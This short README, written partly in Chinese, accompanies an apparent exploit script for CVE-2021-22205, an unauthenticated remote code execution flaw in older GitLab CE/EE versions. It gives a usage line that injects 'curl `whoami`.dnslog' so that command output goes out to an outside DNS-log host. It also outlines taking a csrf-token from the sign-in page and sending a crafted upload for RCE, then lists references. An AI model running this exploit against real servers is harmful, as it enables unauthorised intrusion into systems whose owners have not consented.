CVE-2021-22205 影响版本: Gitlab CE/EE < 13.10.3 Gitlab CE/EE < 13.9.6 Gitlab CE/EE < 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog" 获取csrf-token: 通过 /users/sign_in 获取csrf-token 然后使用前面的 CVE-2021-22205 poc 进行构造上传包进行执行未经身份验证的上传请求,最终rce ref: https://hackerone.com/reports/1154542 https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/ https://forum.ywhack.com/viewthread.php?tid=115611 https://forum.ywhack.com/viewthread.php?tid=116706 https://github.com/RedTeamWing/CVE-2021-22205